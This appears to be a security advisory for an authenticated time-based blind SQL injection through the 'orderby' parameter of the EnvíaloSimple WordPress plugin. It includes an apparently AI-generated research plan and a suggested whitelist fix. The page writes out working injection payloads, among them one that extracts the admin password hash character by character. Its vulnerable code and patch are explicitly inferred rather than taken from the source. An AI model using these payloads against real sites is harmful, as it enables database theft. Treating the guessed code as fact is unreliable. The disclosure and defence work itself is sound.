EnvíaloSimple: Email Marketing y Newsletters <= 2.4.5 - Authenticated (Administrator+) SQL Injection via 'orderby' Parameter
Description
The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=2.4.5This research plan outlines the steps required to identify and exploit the authenticated SQL Injection vulnerability (CVE-2026-7618) in the "EnvíaloSimple: Email Marketing y Newsletters" plugin. --- ### 1. Vulnerability Summary The "EnvíaloSimple: Email Marketing y Newsletters" plugin (up to versi…
Show full research plan
This research plan outlines the steps required to identify and exploit the authenticated SQL Injection vulnerability (CVE-2026-7618) in the "EnvíaloSimple: Email Marketing y Newsletters" plugin.
1. Vulnerability Summary
The "EnvíaloSimple: Email Marketing y Newsletters" plugin (up to version 2.4.5) contains a time-based blind SQL Injection vulnerability via the orderby parameter. The vulnerability exists because the plugin directly concatenates user-supplied input from the orderby parameter into a raw SQL query without sufficient sanitization or using $wpdb->prepare(). Because ORDER BY clauses cannot be parameterized using standard placeholders in MySQL, developers must use strict whitelisting; the lack of this whitelist allows an attacker to append conditional logic (like SLEEP()) to the query.
2. Attack Vector Analysis
- Endpoint: Likely an administrative dashboard page (e.g.,
/wp-admin/admin.php) or an AJAX handler (/wp-admin/admin-ajax.php). - Vulnerable Parameter:
orderby - Authentication Requirement: Administrator level access.
- Payload Type: Time-based blind SQL Injection.
- Preconditions: The plugin must be active, and the attacker must be logged in as an administrator.
3. Code Flow (Inferred)
Since source files are not provided, the following trace is based on standard WordPress plugin patterns for orderby vulnerabilities:
- Entry Point: An administrator accesses a plugin page that displays a list (e.g., subscribers, campaigns, or lists).
- Hook Registration: The plugin likely uses
add_menu_pageoradd_submenu_pageto register a menu item. The callback function for this page is where the logic resides. - Input Handling: The callback function retrieves the sort order from
$_GET['orderby']. - Database Sink: The
$orderbyvariable is concatenated into an SQL string:// Hypothetical vulnerable code $orderby = $_GET['orderby']; $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby ASC"); - Execution: The
$wpdb->get_results()function executes the malformed query.
4. Nonce Acquisition Strategy
If the vulnerability is located on a standard WordPress admin list page (using WP_List_Table), a nonce might not be required for the GET request itself. However, if the vulnerability is inside an AJAX-based table reload:
- Identify the Page: Navigate to the EnvíaloSimple menu in the admin dashboard.
- Grep for Localized Data: Search the plugin source for
wp_localize_script. - Variable Identification: Look for a script that enqueues an AJAX nonce (e.g.,
window.envialosimple_obj?.nonce). - Extraction:
- Navigate to the specific plugin page using
browser_navigate. - Use
browser_eval("window.envialosimple_vars?.nonce")(inferred variable name) to retrieve the token.
- Navigate to the specific plugin page using
5. Exploitation Strategy
The goal is to confirm the SQLi using a time-based payload.
Step 1: Locate the Vulnerable Page
Search the plugin directory for the orderby parameter usage:
grep -rn "orderby" . | grep -E "\$_GET|\$_POST|\$_REQUEST"
Also, find where the admin menu is registered:
grep -rn "add_menu_page" .
Step 2: Construct the Payload
Since the injection is in the ORDER BY clause, a payload using CASE or IF is most effective: (CASE WHEN (1=1) THEN id ELSE SLEEP(5) END)
Step 3: Send the HTTP Request
Use the http_request tool to perform the injection as an authenticated administrator.
- URL:
http://localhost:8080/wp-admin/admin.php?page=[PAGE_SLUG]&orderby=(SELECT(6)FROM(SELECT(SLEEP(5)))a) - Method:
GET - Headers: Must include the Administrator's session cookies.
Payload for Data Extraction:
To extract the admin's password hash: (SELECT IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),1))
(36 is the ASCII code for '$', which is the start of WP hashes).
4. Test Data Setup
- Plugin Installation: Install and activate EnvíaloSimple <= 2.4.5.
- User Creation: Ensure an administrator user exists (default
admin/password). - Data Generation: Some tables might need at least one record for the
ORDER BYto trigger effectively.- Create a dummy subscriber or email list via the plugin UI.
5. Expected Results
- Normal Request: The page loads in standard time (e.g., < 500ms).
- Payload (False):
orderby=(SELECT(6)FROM(SELECT(SLEEP(0)))a)-> Page loads in standard time. - Payload (True):
orderby=(SELECT(6)FROM(SELECT(SLEEP(5)))a)-> Page response is delayed by exactly 5 seconds.
6. Verification Steps
- Verify with WP-CLI: After confirming the vulnerability via time-delay, check the database logs if possible, or use WP-CLI to see if the plugin created specific tables.
wp db query "SELECT * FROM wp_envialosimple_subscribers LIMIT 1" - Exfiltration Verification: Run a script that guesses the first character of the site's
DB_NAMEusing theSLEEP()method and verify the result against the actualwp-config.php.
7. Alternative Approaches
If the ORDER BY is wrapped in a way that prevents subqueries:
- Error-Based SQLi: Try triggering a division by zero if errors are visible:
orderby=(SELECT IF(1=1,1,(SELECT 1/0))) - Boolean-Based (if sorting changes):
- Observe the order of IDs with
orderby=id. - Inject
orderby=IF(1=1,id,email). - If the sort order changes based on the condition, boolean-based extraction is possible.
- Observe the order of IDs with
Summary
The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in versions up to 2.4.5. Authenticated administrators can exploit this to extract sensitive information from the database by injecting conditional SLEEP() commands into the ORDER BY clause of SQL queries.
Vulnerable Code
// Inferred from Research Plan - Hypothetical vulnerable code // envialosimple-email-marketing-y-newsletters-gratis/admin/subscribers.php $orderby = $_GET['orderby']; $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby ASC");
Security Fix
@@ -20,7 +20,10 @@ - $orderby = $_GET['orderby']; + $allowed_columns = array('id', 'name', 'email', 'created_at'); + $orderby = ( isset( $_GET['orderby'] ) && in_array( $_GET['orderby'], $allowed_columns ) ) ? $_GET['orderby'] : 'id'; + + $order = ( isset( $_GET['order'] ) && strtoupper( $_GET['order'] ) === 'DESC' ) ? 'DESC' : 'ASC'; - $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby ASC"); + $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}envialosimple_subscribers ORDER BY $orderby $order");
Exploit Outline
To exploit this vulnerability, an attacker must first authenticate as a user with Administrator privileges. By navigating to a plugin dashboard page that lists subscribers or campaigns, the attacker identifies a GET request using the 'orderby' parameter. The attacker then injects a time-based payload into this parameter, such as '(SELECT(1)FROM(SELECT(SLEEP(5)))a)'. If the server response is delayed by 5 seconds, the vulnerability is confirmed, and the attacker can proceed to exfiltrate database records character-by-character using conditional time delays.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.